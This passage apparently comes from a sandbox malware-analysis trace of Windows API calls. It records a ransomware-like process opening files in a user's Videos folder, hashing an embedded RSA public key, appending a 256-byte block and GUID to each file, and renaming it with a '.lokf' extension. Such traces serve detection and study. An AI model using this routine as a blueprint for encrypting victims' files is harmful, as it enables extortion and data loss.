hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.002] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.002] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.002] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.003] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.003] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13d16, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.003] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.003] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.003] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.003] CloseHandle (hObject=0x5cc) returned 1 [0061.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.005] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0061.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0061.005] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\EjJOrnaIC80zrDKVf.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\ejjornaic80zrdkvf.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\EjJOrnaIC80zrDKVf.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\ejjornaic80zrdkvf.mkv.lokf")) returned 1 [0061.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.005] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.005] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.006] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81f3ecc0, ftCreationTime.dwHighDateTime=0x1d4d43c, ftLastAccessTime.dwLowDateTime=0x2d0c61f0, ftLastAccessTime.dwHighDateTime=0x1d4cc3b, ftLastWriteTime.dwLowDateTime=0x2d0c61f0, ftLastWriteTime.dwHighDateTime=0x1d4cc3b, nFileSizeHigh=0x0, nFileSizeLow=0xa02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="l-4D7O.mkv", cAlternateFileName="")) returned 1 [0061.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0061.006] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\l-4D7O.mkv") returned=".mkv" [0061.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\l-4D7O.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\l-4d7o.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.006] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=2562) returned 1 [0061.006] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.009] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.009] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.010] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.010] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.010] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa02, lpOverlapped=0x0) returned 1 [0061.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.010] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.010] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.010] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.011] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.011] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.011] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.011] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.011] GetLastError () returned 0x0 [0061.011] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.011] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.011] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.011] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.011] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa00) returned 0x326aa18 [0061.011] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.011] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86a88 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86160 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86ad0 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86178 [0061.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861a8 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861c0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.012] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861a8 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861c0 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861c0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c861a8 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0061.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861c0 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861a8 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.013] GetCurrentThreadId () returned 0x9e0 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c130 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.013] GetCurrentThreadId () returned 0x9e0 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0061.013] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861a8 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861c0 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86190 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861d8 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857d0 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0061.014] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861a8 | out: hHeap=0x660000) returned 1 [0061.014] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861a8 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861a8 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0061.015] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861c0 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86190 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86178 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86ad0 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 